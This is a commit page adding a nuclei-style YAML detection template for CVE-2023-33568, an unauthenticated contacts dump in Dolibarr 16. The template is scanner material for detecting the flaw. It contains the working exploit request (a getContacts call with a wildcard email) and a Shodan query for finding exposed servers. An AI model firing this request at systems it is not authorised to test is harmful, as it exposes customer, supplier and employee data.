Merge pull request #7488 from projectdiscovery/CVE-2023-33568

Create CVE-2023-33568.yaml
patch-1
pussycat0x 2023-06-20 14:44:52 +05:30 committed by GitHub
commit d449083aab
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: CVE-2023-33568
info:
name: Dolibarr Unauthenticated Contacts Database Theft
author: DhiyaneshDK
severity: high
description: |
An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
reference:
- https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/
- https://nvd.nist.gov/vuln/detail/CVE-2023-33568
metadata:
max-request: 1
verified: "true"
shodan-query: http.favicon.hash:440258421
tags: cve,cve2023,dolibarr,unauth
http:
- method: GET
path:
- "{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"database_name":'
- '"database_user":'
condition: and
- type: status
status:
- 200